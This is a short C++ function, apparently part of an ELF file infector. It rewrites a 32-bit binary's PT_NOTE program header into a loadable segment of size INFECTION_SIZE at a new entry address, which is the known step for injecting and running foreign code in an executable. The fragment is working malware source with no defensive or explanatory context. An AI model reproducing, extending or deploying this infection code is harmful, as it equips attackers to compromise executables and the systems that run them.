bool Target::patchPhdr()
{
  Elf32_Phdr* note = phdr + 5;
  if (note->p_type != PT_NOTE)
    return false;

  note->p_type = PT_LOAD;
  /* align up multiple of 16 */
  note->p_offset = aligned_filesize;
  note->p_vaddr =
  note->p_paddr = newEntryAddr();
  note->p_filesz =
  note->p_memsz = INFECTION_SIZE;
  note->p_flags = phdr[2].p_flags;
  note->p_align = phdr[2].p_align;
  return true;
}
